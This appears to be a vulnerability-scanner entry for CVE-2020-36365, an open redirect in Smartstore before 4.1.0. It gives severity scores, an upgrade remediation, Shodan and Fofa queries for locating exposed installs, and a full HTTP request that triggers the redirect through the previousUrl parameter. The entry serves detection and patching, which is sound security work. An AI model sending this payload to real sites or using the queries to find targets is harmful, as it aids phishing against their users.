| Title | Smartstore <4.1.0 - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. |
| Remediation | Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.09448 |
| CVE ID | CVE-2020-36365 |
| CWE ID | CWE-601 |
| Shodan Query | http.html:'content="Smartstore'http.html:'content="smartstore' |
| Fofa Query | body='content="smartstore' |
| Tags | cve2020 cve redirect smartstore vuln |
Smartstore (aka “SmartStoreNET”) before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
GET /backend/admin/common/clearcache?previousUrl=http://www.interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36365.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-36365.pcap
N/AN/A